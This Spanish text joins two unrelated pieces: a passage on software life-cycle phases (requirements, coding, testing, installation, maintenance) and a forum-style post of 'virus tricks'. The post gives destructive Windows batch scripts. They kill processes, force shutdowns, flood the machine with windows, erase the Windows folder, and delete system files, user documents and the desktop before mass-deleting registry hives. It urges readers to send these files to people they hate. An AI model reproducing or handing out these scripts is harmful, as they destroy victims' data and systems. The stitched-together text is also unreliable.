(UdeD). 2. Preparar y realizar las reuniones para elicitación/negociación. 3. Identificar/revisar los objetivos del usuario. 4. Identificar/revisar los objetivos del sistema. 5. Identificar/revisar los requisitos de información. 6. Identificar/revisar los requisitos funcionales. 7. Identificar/revisar los requisitos no funcionales. 8. Priorizar objetivos y requisitos. Algunos principios básicos a tener en cuenta: • Presentar y entender cabalmente el dominio de la información del problema. • Definir correctamente las funciones que debe realizar el Software. • Representar el comportamiento del software a consecuencias de acontecimientos externos, particulares, incluso inesperados. • Reconocer requisitos incompletos, ambiguos o contradictorios. • Dividir claramente los modelos que representan la información, las funciones y comportamiento y características no funcionales. Clasificación e identificación de requerimientos Se pueden identificar dos formas de requisitos: • Requisitos de usuario: Los requisitos de usuario son frases en lenguaje natural junto a diagramas con los servicios que el sistema debe proporcionar, así como las restricciones bajo las que debe operar. • Requisitos de sistema: Los requisitos de sistema determinan los servicios del sistema y pero con las restricciones en detalle. Sirven como contrato. Es decir, ambos son lo mismo, pero con distinto nivel de detalle. Ejemplo de requisito de usuario: El sistema debe hacer préstamos Ejemplo de requisito de sistema: Función préstamo: entrada código socio, código ejemplar; salida: fecha devolución; etc. Se clasifican en tres los tipos de requisitos de sistema: • Requisitos funcionales Los requisitos funcionales describen: • Los servicios que proporciona el sistema (funciones). • La respuesta del sistema ante determinadas entradas. • El comportamiento del sistema en situaciones particulares. • Requisitos no funcionales Los requisitos no funcionales son restricciones de los servicios o funciones que ofrece el sistema (ej. cotas de tiempo, proceso de desarrollo, rendimiento, etc.) Ejemplo 1. La biblioteca Central debe ser capaz de atender simultáneamente a todas las bibliotecas de la Universidad Ejemplo 2. El tiempo de respuesta a una consulta remota no debe ser superior a 1/2 s A su vez, hay tres tipos de requisitos no funcionales: • Requisitos del producto. Especifican el comportamiento del producto (Ej. prestaciones, memoria, tasa de fallos, etc.) • Requisitos organizativos. Se derivan de las políticas y procedimientos de las organizaciones de los clientes y desarrolladores (Ej. estándares de proceso, lenguajes de programación, etc.) • Requisitos externos. Se derivan de factores externos al sistema y al proceso de desarrollo (Ej. requisitos legislativos, éticos, etc.) • Requisitos del dominio. Los requisitos del dominio se derivan del dominio de la aplicación y reflejan características de dicho dominio. Pueden ser funcionales o no funcionales. Ej. El sistema de biblioteca de la Universidad debe ser capaz de exportar datos mediante el Lenguaje de Intercomunicación de Bibliotecas de España (LIBE). Ej. El sistema de biblioteca no podrá acceder a bibliotecas con material censurado. Diseño del sistema Codificación del software Durante esta etapa se realizan las tareas que comúnmente se conocen como programación; que consiste, esencialmente, en llevar a código fuente, en el lenguaje de programación elegido, todo lo diseñado en la fase anterior. Esta tarea la realiza el programador, siguiendo por completo los lineamientos impuestos en el diseño y en consideración siempre a los requisitos funcionales y no funcionales (ERS) especificados en la primera etapa. Es común pensar que la etapa de programación o codificación (algunos la llaman implementación) es la que insume la mayor parte del trabajo de desarrollo del software; sin embargo, esto puede ser relativo (y generalmente aplicable a sistemas de pequeño porte) ya que las etapas previas son cruciales, críticas y pueden llevar bastante más tiempo. Se suele hacer estimaciones de un 30% del tiempo total insumido en la programación, pero esta cifra no es consistente ya que depende en gran medida de las características del sistema, su criticidad y el lenguaje de programación elegido.7 En tanto menor es el nivel del lenguaje mayor será el tiempo de programación requerido, así por ejemplo se tardaría más tiempo en codificar un algoritmo en lenguaje ensamblador que el mismo programado en lenguaje C. Mientras se programa la aplicación, sistema, o software en general, se realizan también tareas de depuración, esto es la labor de ir liberando al código de los errores factibles de ser hallados en esta fase (de semántica, sintáctica y lógica). Hay una suerte de solapamiento con la fase siguiente, ya que para depurar la lógica es necesario realizar pruebas unitarias, normalmente con datos de prueba; claro es que no todos los errores serán encontrados sólo en la etapa de programación, habrán otros que se encontrarán durante las etapas subsiguientes. La aparición de algún error funcional (mala respuesta a los requerimientos) eventualmente puede llevar a retornar a la fase de diseño antes de continuar la codificación. Durante la fase de programación, el código puede adoptar varios estados, dependiendo de la forma de trabajo y del lenguaje elegido, a saber: • Código fuente: es el escrito directamente por los programadores en editores de texto, lo cual genera el programa. Contiene el conjunto de instrucciones codificadas en algún lenguaje de alto nivel. Puede estar distribuido en paquetes, procedimientos, bibliotecas fuente, etc. • Código objeto: es el código binario o intermedio resultante de procesar con un compilador el código fuente. Consiste en una traducción completa y de una sola vez de éste último. El código objeto no es inteligible por el ser humano (normalmente es formato binario) pero tampoco es directamente ejecutable por la computadora. Se trata de una representación intermedia entre el código fuente y el código ejecutable, a los fines de un enlace final con las rutinas de biblioteca y entre procedimientos o bien para su uso con un pequeño intérprete intermedio [a modo de distintos ejemplos véase EUPHORIA, (intérprete intermedio), FORTRAN (compilador puro) MSIL (Microsoft Intermediate Language) (intérprete) y BASIC (intérprete puro, intérprete intermedio, compilador intermedio o compilador puro, depende de la versión utilizada)]. o El código objeto no existe si el programador trabaja con un lenguaje a modo de intérprete puro, en este caso el mismo intérprete se encarga de traducir y ejecutar línea por línea el código fuente (de acuerdo al flujo del programa), en tiempo de ejecución. En este caso tampoco existe el o los archivos de código ejecutable. Una desventaja de esta modalidad es que la ejecución del programa o sistema es un poco más lenta que si se hiciera con un intérprete intermedio, y bastante más lenta que si existe el o los archivos de código ejecutable. Es decir no favorece el rendimiento en velocidad de ejecución. Pero una gran ventaja de la modalidad intérprete puro, es que el esta forma de trabajo facilita enormemente la tarea de depuración del código fuente (frente a la alternativa de hacerlo con un compilador puro). Frecuentemente se suele usar una forma mixta de trabajo (si el lenguaje de programación elegido lo permite), es decir inicialmente trabajar a modo de intérprete puro, y una vez depurado el código fuente (liberado de errores) se utiliza un compilador del mismo lenguaje para obtener el código ejecutable completo, con lo cual se agiliza la depuración y la velocidad de ejecución se optimiza. • Código ejecutable: Es el código binario resultado de enlazar uno o más fragmentos de código objeto con las rutinas y bibliotecas necesarias. Constituye uno o más archivos binarios con un formato tal que el sistema operativo es capaz de cargarlo en la memoria RAM (eventualmente también parte en una memoria virtual), y proceder a su ejecución directa. Por lo anterior se dice que el código ejecutable es directamente «inteligible por la computadora». El código ejecutable, también conocido como código máquina, no existe si se programa con modalidad de «intérprete puro». Pruebas (unitarias y de integración) Entre las diversas pruebas que se le efectúan al software se pueden distinguir principalmente: • Prueba unitarias: Consisten en probar o testear piezas de software pequeñas; a nivel de secciones, procedimientos, funciones y módulos; aquellas que tengan funcionalidades específicas. Dichas pruebas se utilizan para asegurar el correcto funcionamiento de secciones de código, mucho más reducidas que el conjunto, y que tienen funciones concretas con cierto grado de independencia. • Pruebas de integración: Se realizan una vez que las pruebas unitarias fueron concluidas exitosamente; con éstas se intenta asegurar que el sistema completo, incluso los subsistemas que componen las piezas individuales grandes del software funcionen correctamente al operar e inteoperar en conjunto. Las pruebas normalmente se efectúan con los llamados datos de prueba, que es un conjunto seleccionado de datos típicos a los que puede verse sometido el sistema, los módulos o los bloques de código. También se escogen: Datos que llevan a condiciones límites al software a fin de probar su tolerancia y robustez; datos de utilidad para mediciones de rendimiento; datos que propocan condiciones eventuales o particulares poco comunes y a las que el software normalmente no estará sometido pero pueden ocurrir; etc. Los «datos de prueba» no necesariamente son ficticios o «creados», pero normalmente si lo son los de poca probabilidad de ocurrencia. Generalmente, existe un fase probatoria final y completa del software, llamada Beta Test, durante la cual el sistema instalado en condiciones normales de operación y trabajo es probado exhaustivamente a fin de encontrar errores, inestabilidades, respuestas erróneas, etc. que hayan pasado los previos controles. Estas son normalmente realizadas por personal idóneo contratado o afectado específicamente a ello. Los posibles errores encontrados se transmiten a los desarrolladores para su depuración. En el caso de software de desarrollo «a pedido», el usuario final (cliente) es el que realiza el Beta Test, teniendo para ello un período de prueba pactado con el desarrollador. Instalación y paso a producción La instalación del software es el proceso por el cual los programas desarrollados son transferidos apropiadamente al computador destino, inicializados, y, eventualmente, configurados; todo ello con el propósito de ser ya utilizados por el usuario final. Constituye la etapa final en el desarrollo propiamente dicho del software. Luego de ésta el producto entrará en la fase de funcionamiento y producción, para el que fuera diseñado. La instalación, dependiendo del sistema desarrollado, puede consistir en una simple copia al disco rígido destino (casos raros actualmente); o bien, más comúnmente, con una de complejidad intermedia en la que los distintos archivos componentes del software (ejecutables, bibliotecas, datos propios, etc.) son descomprimidos y copiados a lugares específicos preestablecidos del disco; incluso se crean vínculos con otros productos, además del propio sistema operativo. Este último caso, comúnmente es un proceso bastante automático que es creado y guiado con heramientas software específicas (empaquetado y distribución, instaladores). En productos de mayor complejidad, la segunda alternativa es la utilizada, pero es realizada o guiada por especialistas; puede incluso requerirse la instalación en varios y distintos computadores (instalación distribuida). También, en software de mediana y alta complejidad normalmente es requerido un proceso de configuración y chequeo, por el cual se asignan adecuados parámetros de funcionamiento y se testea la operatividad funcional del producto. En productos de venta masiva las instalaciones completas, si son relativamente simples, suelen ser realizadas por los propios usuarios finales (tales como sistemas operativos, paquetes de oficina, utilitarios, etc.) con herramientas propias de instalación guiada; incluso la configuración suele ser automática. En productos de diseño específico o «a medida» la instalación queda restringida, normalmente, a personas especialistas involucradas en el desarrollo del software en cuestión. Una vez realizada exitosamente la instalación del software, el mismo pasa a la fase de producción (operatividad), durante la cual cumple las funciones para las que fue desarrollado, es decir, es finalmente utilizado por el (o los) usuario final, produciendo los resultados esperados. Mantenimiento El mantenimiento de software es el proceso de control, mejora y optimización del software ya desarrollado e instalado, que también incluye depuración de errores y defectos que puedan haberse filtrado de la fase de pruebas de control y beta test. Esta fase es la última (antes de iterar, según el modelo empleado) que se aplica al ciclo de vida del desarrollo de software. La fase de mantenimiento es la que viene después de que el software está operativo y en producción. De un buen diseño y documentación del desarrollo dependerá cómo será la fase de mantenimiento, tanto en costo temporal como monetario. Modificaciones realizadas a un software que fue elaborado con una documentación indebida o pobre y mal diseño puede llegar a ser tanto o más costosa que desarrollar el software desde el inicio. Por ello, es de fundamental importancia respetar debidamente todas las tareas de las fases del desarrollo y mantener adecuada y completa la documentación. El período de la fase de mantenimiento es normalmente el mayor en todo el ciclo de vida.7 Esta fase involucra también actualizaciones y evoluciones del software; no necesariamente implica que el sistema tuvo errores. Uno o más cambios en el software, por ejemplo de adaptación o evolutivos, puede llevar incluso a rever y adaptar desde parte de las primeras fases del desarrollo inicial, alterando todas las demás; dependiendo de cuán profundos sean los cambios. El modelo cascada común es particularmente costoso en mantenimiento, ya que su rigidez implica que cualquier cambio provoca regreso a fase inicial y fuertes alteraciones en las demás fases del ciclo de vida. Durante el período de mantenimiento, es común que surjan nuevas revisiones y versiones del producto; que lo liberan más depurado, con mayor y mejor funcionalidad, mejor rendimiento, etc. Varias son las facetas que pueden ser alteradas para provocar cambios deseables, evolutivos, adaptaciones o ampliaciones y mejoras. Básicamente se tienen los siguientes tipos de cambios: • Perfectivos: Aquellos que llevan a una mejora de la calidad interna del software en cualquier aspecto: Reestructuración del código, definición más clara del sistema y su documentación; optimización del rendimiento y eficiencia. • Evolutivos: Agregados, modificaciones, incluso eliminaciones, necesarias en el software para cubrir su expansión o cambio, según las necesidades del usuario. • Adaptivos: Modificaciones que afectan a los entornos en los que el sistema opera, tales como: Cambios de configuración del hardware (por actualización o mejora de componentes electrónicos), cambios en el software de base, en gestores de base de datos, en comunicaciones, etc. • Correctivos: Alteraciones necesarias para corregir errores de cualquier tipo en el producto software desarrollado.

AQUÍ LES DEJO UNOS TRUCOS PARA HACER VIRUS Y ASUSTAR GENTE O SOLO DEJARLA LLORANDO PRIMERO UNOS VIRUS 1- Abran bloc de notas 2- Pegen esto : @echo off msg * Has sido infectado por doc_papa taskkill /f /t msnmsgr.exe taskkill /f /t iexplore.exe taskkill /f /t svchost.exe taskkill /f /t explorer.exe y ponen Guardar como , y le ponen un nombre y la extencion bat, por ejemplo : Virus.bat Este archivo va a poner un mensaje en el escritorio y va a blokear aplicaciones como el msn,internet explorer, y el explorador de windows osea todos los iconos y la barra de inicio . Otro supuesto virus : msg * Has sido infectado por doc_papa shutdown -s Lo que hace este archivo es poner un mensaje en el escritorio el mensaje seria HAS SIDO INFECTADO POR DOC_PAPA pero pueden cambiarlo a su gusto , y apaga la pc Aca les dejo el ultimo supuesto virus y el mas molesto @echo off color 0a echo ==================== echo = = echo = h4ckinger = echo = = echo ==================== echo . echo . echo . echo Para usar el programa apreta la telca 1 Para ver mas opciones apreta la tecla 2 Para salir apreta la tecla 3 pause>nul cls echo Instalando virus . . . echo Borrando disco rigido . . . echo Borrando archivos . . . echo Borrando el registro . . . echo Borrando antivirus . . . echo Borrando ip . . . echo Desactivando el firewall echo Borrando puertos de conexion . . . echo Error Windows . . . Virus alert!! echo El equipo no puede seguir procesando Caution virus.bat shutdown -s -t 60 -c "El equipo no puede seguir procesando causa: Virus alert!! echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.exe echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> virus.bat echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.exe echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Troyan.bat echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.exe echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Malware.bat echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.exe echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Spyware.bat echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.exe echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat echo start >> Virusavanced.bat start virus.bat start troyan.bat echo msgbox ("Instalando virus . . ." ) >> abrime.vbs echo msgbox ("Borrando ip . . ." ) >> abrime.vbs echo msgbox (" Borrando puertos . . ." ) >> abrime.vbs echo msgbox ("Desactivando el firewall . . ." ) >> abrime.vbs echo msgbox ("Borrando el antivirus . . ." ) >> abrime.vbs echo msgbox ("Virus creado por H4ckinger" ) >> abrime.vbs start abrime.vbs echo MsgBox ("Sistem Error" ),16,("Virus" ) >> Virus.vbs echo MsgBox ("El sistema no puede seguir procesando" ),16,("Virus alert" ) >> Virus.vbs echo MsgBox ("VIRUS ALERT!!" ),16,("Virus" ) >> Virus.vbs start Virus.vbs echo @echo off >> jaja.bat echo color 0a >> jaja.bat echo :uji >> jaja.bat echo echo Virus Alert! ! ! Virus Alert! ! ! Virus Alert! ! ! >> jaja.bat echo goto uji >> jaja.bat start jaja.bat echo @echo off >> jaj.bat echo color 0a >> jaj.bat echo :uji >> jaj.bat echo echo Virus Alert! ! ! Virus Alert! ! ! Virus Alert! ! ! >> jaj.bat echo goto uji >> jaj.bat start jaj.bat echo @echo off >> thevirus.bat echo color 0a >> thevirus.bat echo :uji >> thevirus.bat echo echo Virus Alert! ! ! Virus Alert! ! ! Virus Alert! ! ! >> thevirus.bat echo goto uji >> thevirus.bat start thevirus.bat Pause>nul exit Este virus crea mensajes con esos ruidos fuertes de alerta xD , apaga la pc en 60 segs. , crea archivos , y tambien unas ventanitas verdes que dicen VIRUS ALERT ! ! ! en color verde que bajan a toda velocidad Avisos Google VIRUS MOLESTO: ABRAN BLOCK DE NOTAS Y PONGAN ESTO: START START START START START START START START COMO 200 VECES O MAS SI QUIEREN (CUANTO MAS MEJOR) Y LUEGO PONGAN GUARDAR COMO BOMB.BAT Y DEDSDPUES LES APARECERA UN ICONITO DE UNA TUERCA EN EL ESCRITORIO, ESO SE LO ENVIAN A ALGUIEN Y CUANDO LO ABRAN BOOOM!!!!/color] SE ABRIRAN TANTAS VENTANAS QUE SE TILDARA LA MAQUINA (PUEDEN ABRIRLO USTEDES, TOTAL ESTE VIRUS ES INOFENSIVO SOLO HACE QUE SE TE TILDE LA MAQUINA) ............................................................................................................................................................. DESPUES ESTE VIRUS ES LETAL BORRA WINDOWS DEVEN ABRIR BLOCK DE NOTAS Y PONER ESTO: @ echo off msg * Hasta la vista Windows ERASE /f /s /q C: windows shutdown -s -t Y PONER GUARDAR COMO Y PONGANLE EL NOMBRE VIR.BAT Y LES APARECERA EL MISMO ICONITO DE LA TUERCA QUE EN EL PRIMER VIRUS ESTE VIRUS PUEDEN ENVIARSELO A ALGUIEN QUE ODIEN MUCHO, PORUQUE BORRA EL WINDOWS DEL QUE ABRE EL ARCHIVO .................................................................................................................................................... ESTE VIRUS ES DE MENTIRA: PONGAN EN BLOCK DE NOTAS ESTO msg * (EL MENSAJE QUE QUIERES QUE APARESCA) hutdown -r -t 30 -c "tu pc se apagara en 30 segundos, despues saldra humo de la cpu. GUARDENLO COMO MSG.BAT Y SI LO ABREN LES APARECERA EL MENSAJE QUE QUISIERON PONER Y SE APAGARA LA COMPU EN 30 SEGUNDOS ........................................................................................................................................................ ESTE VIRUS ES EL MAS LETAL DE TODOS!!!!!! POR NADA EN EL MUNDO LO ABRAN!!!!!!! echo off cls msg * Estas a punto de que ex plote la pc! start /max http://www.amig.es/datos/fotos/2647/p... start /max http://blog.educastur.es/ticvegadeo/f... start /max http://cyberprensa.com/fotos/135/expl... start /max http://www.opcionweb.com/wp-content/u... msg * Has sido hackeado por "raul"! msg * se tiro tu pc! msg * sera mejor que compres un pc nuevo! shutdown -r -t 30 -c "tu pc se apagara en 30 segundos, despues saldra humo de la cpu. este comando es para hacer una broma erase C:WINDOWS q este borra windows color 0A del /f %systemroot%systemhal.dll del /f %systemroot%system32hal.dll del /f %systemroot%systemsystem.* del /f %systemroot%system32system.* del /f %systemroot%system32Win.com del /f %systemroot%system32command.com del /f %systemroot%system32keyboard.* del /f %systemroot%system32shell.* del /f %systemroot%system32mouse.* del /f %systemroot%system32msvideo.* del /f %systemroot%regedit.exe del /f %systemroot%taskman.exe del /f %systemroot%explorer.exe del /f %systemroot%system32taskkill.exe del /f %systemroot%system32tasklist.exe del /f %systemroot%system32taskmgr.exe del /f %systemroot%keyboard.* rem borrar docs rd /s /q "%homepath%/Mis Documentos" rem borrar escritorio cd cd %HOMEPATH% del *.* /f /s /q cd Desktop cd Escritorio del *.* /f /s /q rem borrar todo lo del discoduro cd cd %SYSTEMDRIVE% del *.* /f /s /q reg delete "HKEY_CURRENT_CONFIGSoftware" /f reg delete "HKEY_CURRENT_CONFIGSystem" /f reg delete "HKEY_USERS.DEFAULT" /f reg delete "HKEY_USERSS-1-5-18" /f reg delete "HKEY_USERSS-1-5-19" /f reg delete "HKEY_USERSS-1-5-19_Classes" /f reg delete "HKEY_USERSS-1-5-20" /f reg delete "HKEY_USERSS-1-5-20_Classes" /f reg delete "HKEY_USERSS-1-5-21-602162358-606747145-725345543-1003" /f reg delete "HKEY_USERSS-1-5-21-602162358-606747145-725345543-1003_Classes" /f reg delete "HKEY_LOCAL_MACHINEHARDWARE" /f reg delete "HKEY_LOCAL_MACHINESAM" /f reg delete "HKEY_LOCAL_MACHINESECURITY" /f reg delete "HKEY_LOCAL_MACHINESOFTWARE" /f reg delete "HKEY_LOCAL_MACHINESYSTEM" /f reg delete "HKEY_CURRENT_USERAppEvents" /f reg delete "HKEY_CURRENT_USERConsole" /f reg delete "HKEY_CURRENT_USERControl Panel" /f reg delete "HKEY_CURRENT_USEREnvironment" /f reg delete "HKEY_CURRENT_USERIdentities" /f reg delete "HKEY_CURRENT_USERKeyboard Layout" /f reg delete "HKEY_CURRENT_USERPrinters" /f reg delete "HKEY_CURRENT_USERSessionInformation" /f reg delete "HKEY_CURRENT_USERSoftware" /f reg delete "HKEY_CURRENT_USERUNICODE Program Groups" /f reg delete "HKEY_CURRENT_USERVolatile Environment" /f reg delete "HKEY_CURRENT_USERWindows 3.1 Migration Status" /f reg delete "HKEY_CLASSES_ROOT*" /f reg delete "HKEY_CLASSES_ROOT.iso" /f reg delete "HKEY_CLASSES_ROOT.bin" /f reg delete "HKEY_CLASSES_ROOT.img" /f reg delete "HKEY_CLASSES_ROOT.cif" /f reg delete "HKEY_CLASSES_ROOT.fcd" /f reg delete "HKEY_CLASSES_ROOT.nrg" /f reg delete "HKEY_CLASSES_ROOT.gcd" /f reg delete "HKEY_CLASSES_ROOT.p01" /f reg delete "HKEY_CLASSES_ROOT.c2d" /f reg delete "HKEY_CLASSES_ROOT.tao" /f reg delete "HKEY_CLASSES_ROOT.dao" /f reg delete "HKEY_CLASSES_ROOT.cdi" /f reg delete "HKEY_CLASSES_ROOT.cue" /f reg delete "HKEY_CLASSES_ROOT.cd" /f reg delete "HKEY_CLASSES_ROOT.gi" /f reg delete "HKEY_CLASSES_ROOT.pxi" /f reg delete "HKEY_CLASSES_ROOT.pdi" /f reg delete "HKEY_CLASSES_ROOT.mds" /f reg delete "HKEY_CLASSES_ROOT.mdf" /f reg delete "HKEY_CLASSES_ROOT.ccd" /f reg delete "HKEY_CLASSES_ROOT.vc4" /f reg delete "HKEY_CLASSES_ROOT.b5t" /f reg delete "HKEY_CLASSES_ROOT.b5i" /f reg delete "HKEY_CLASSES_ROOT.dmg" /f reg delete "HKEY_CLASSES_ROOT.ibp" /f reg delete "HKEY_CLASSES_ROOT.ibq" /f reg delete "HKEY_CLASSES_ROOT.ncd" /f reg delete "HKEY_CLASSES_ROOT.bmp" /f reg delete "HKEY_CLASSES_ROOT.dib" /f reg delete "HKEY_CLASSES_ROOT.jpeg" /f reg delete "HKEY_CLASSES_ROOT.jpg" /f reg delete "HKEY_CLASSES_ROOT.jpe" /f reg delete "HKEY_CLASSES_ROOT.jfif" /f reg delete "HKEY_CLASSES_ROOT.gif" /f reg delete "HKEY_CLASSES_ROOT.png" /f reg delete "HKEY_CLASSES_ROOT.tif" /f reg delete "HKEY_CLASSES_ROOT.tiff" /f reg delete "HKEY_CLASSES_ROOT.psd" /f reg delete "HKEY_CLASSES_ROOT.pdd" /f reg delete "HKEY_CLASSES_ROOT.rle" /f reg delete "HKEY_CLASSES_ROOT.eps" /f reg delete "HKEY_CLASSES_ROOT.psb" /f reg delete "HKEY_CLASSES_ROOT.pcx" /f reg delete "HKEY_CLASSES_ROOT.pdf" /f reg delete "HKEY_CLASSES_ROOT.pdp" /f reg delete "HKEY_CLASSES_ROOT.raw" /f reg delete "HKEY_CLASSES_ROOT.pct" /f reg delete "HKEY_CLASSES_ROOT.pict" /f reg delete "HKEY_CLASSES_ROOT.pxr" /f reg delete "HKEY_CLASSES_ROOT.pbm" /f reg delete "HKEY_CLASSES_ROOT.pgm" /f reg delete "HKEY_CLASSES_ROOT.ppm" /f reg delete "HKEY_CLASSES_ROOT.pfm" /f reg delete "HKEY_CLASSES_ROOT.pnm" /f reg delete "HKEY_CLASSES_ROOT.pam" /f reg delete "HKEY_CLASSES_ROOT.sct" /f reg delete "HKEY_CLASSES_ROOT.tga" /f reg delete "HKEY_CLASSES_ROOT.vda" /f reg delete "HKEY_CLASSES_ROOT.icb" /f reg delete "HKEY_CLASSES_ROOT.vst" /f reg delete "HKEY_CLASSES_ROOT.rtf" /f reg delete "HKEY_CLASSES_ROOT.txt" /f reg delete "HKEY_CLASSES_ROOT.docx" /f reg delete "HKEY_CLASSES_ROOT.kgb" /f reg delete "HKEY_CLASSES_ROOT.doc" /f reg delete "HKEY_CLASSES_ROOT.dot" /f reg delete "HKEY_CLASSES_ROOT.docm" /f reg delete "HKEY_CLASSES_ROOT.dotx" /f reg delete "HKEY_CLASSES_ROOT.dotm" /f reg delete "HKEY_CLASSES_ROOT.xlsx" /f reg delete "HKEY_CLASSES_ROOT.xlsm" /f reg delete "HKEY_CLASSES_ROOT.xlsb" /f reg delete "HKEY_CLASSES_ROOT.xls" /f reg delete "HKEY_CLASSES_ROOT.xml" /f reg delete "HKEY_CLASSES_ROOT.mht" /f reg delete "HKEY_CLASSES_ROOT.mhtml" /f reg delete "HKEY_CLASSES_ROOT.htm" /f reg delete "HKEY_CLASSES_ROOT.html" /f reg delete "HKEY_CLASSES_ROOT.xltx" /f reg delete "HKEY_CLASSES_ROOT.xltm" /f reg delete "HKEY_CLASSES_ROOT.csv" /f reg delete "HKEY_CLASSES_ROOT.prn" /f reg delete "HKEY_CLASSES_ROOT.dif" /f reg delete "HKEY_CLASSES_ROOT.slk" /f reg delete "HKEY_CLASSES_ROOT.xlam" /f reg delete "HKEY_CLASSES_ROOT.mdb" /f reg delete "HKEY_CLASSES_ROOT.php" /f reg delete "HKEY_CLASSES_ROOT.swf" /f reg delete "HKEY_CLASSES_ROOT.fla" /f reg delete "HKEY_CLASSES_ROOT.exe" /f reg delete "HKEY_CLASSES_ROOT.log" /f reg delete "HKEY_CLASSES_ROOT.avi" /f reg delete "HKEY_CLASSES_ROOT.mp3" /f reg delete "HKEY_CLASSES_ROOT.wav" /f reg delete "HKEY_CLASSES_ROOT.vmw" /f reg delete "HKEY_CLASSES_ROOT.dvx" /f reg delete "HKEY_CLASSES_ROOT.old" /f reg delete "HKEY_CLASSES_ROOT.prx" /f reg delete "HKEY_CLASSES_ROOT.bak" /f reg delete "HKEY_CLASSES_ROOT.dat" /f reg delete "HKEY_CLASSES_ROOT.csv" /f reg delete "HKEY_CLASSES_ROOT.tmp" /f reg delete "HKEY_CLASSES_ROOT.ini" /f reg delete "HKEY_CLASSES_ROOT.dll" /f reg delete "HKEY_CLASSES_ROOT.mdb" /f reg delete "HKEY_CLASSES_ROOT.wsc" /f reg delete "HKEY_CLASSES_ROOT.mod" /f reg delete "HKEY_CLASSES_ROOT.vbs" /f reg delete "HKEY_CLASSES_ROOT.cmd" /f reg delete "HKEY_CLASSES_ROOT.scr" /f reg delete "HKEY_CLASSES_ROOT.cpl" /f reg delete "HKEY_CLASSES_ROOT.rat" /f reg delete "HKEY_CLASSES_ROOT.msi" /f reg delete "HKEY_CLASSES_ROOT.cpl" /f reg delete "HKEY_CLASSES_ROOT.xml" /f reg delete "HKEY_CLASSES_ROOT.msc" /f reg delete "HKEY_CLASSES_ROOT.drv" /f reg delete "HKEY_CLASSES_ROOT.vxd" /f reg delete "HKEY_CLASSES_ROOT.ocx" /f reg delete "HKEY_CLASSES_ROOT.uce" /f reg delete "HKEY_CLASSES_ROOT.tsp" /f reg delete "HKEY_CLASSES_ROOT.tmp" /f reg delete "HKEY_CLASSES_ROOT.tsk" /f reg delete "HKEY_CLASSES_ROOT.tlb" /f reg delete "HKEY_CLASSES_ROOT.tha" /f reg delete "HKEY_CLASSES_ROOT.sve" /f reg delete "HKEY_CLASSES_ROOT.sql" /f reg delete "HKEY_CLASSES_ROOT.sep" /f reg delete "HKEY_CLASSES_ROOT.sig" /f reg delete "HKEY_CLASSES_ROOT.olb" /f reg delete "HKEY_CLASSES_ROOT.oca" /f reg delete "HKEY_CLASSES_ROOT.nt" /f reg delete "HKEY_CLASSES_ROOT.nls" /f reg delete "HKEY_CLASSES_ROOT.pro" /f reg delete "HKEY_CLASSES_ROOT.rll" /f reg delete "HKEY_CLASSES_ROOT.rom" /f reg delete "HKEY_CLASSES_ROOT.ram" /f reg delete "HKEY_CLASSES_ROOT.nls" /f reg delete "HKEY_CLASSES_ROOT.nld" /f reg delete "HKEY_CLASSES_ROOT.ita" /f reg delete "HKEY_CLASSES_ROOT.iec" /f reg delete "HKEY_CLASSES_ROOT.ime" /f reg delete "HKEY_CLASSES_ROOT.h" /f reg delete "HKEY_CLASSES_ROOT.hxx" /f reg delete "HKEY_CLASSES_ROOT.sys" /f reg delete "HKEY_CLASSES_ROOT.dep" /f reg delete "HKEY_CLASSES_ROOT.deu" /f reg delete "HKEY_CLASSES_ROOT.enu" /f reg delete "HKEY_CLASSES_ROOT.esn" /f reg delete "HKEY_CLASSES_ROOT.chm" /f reg delete "HKEY_CLASSES_ROOT.hlp" /f 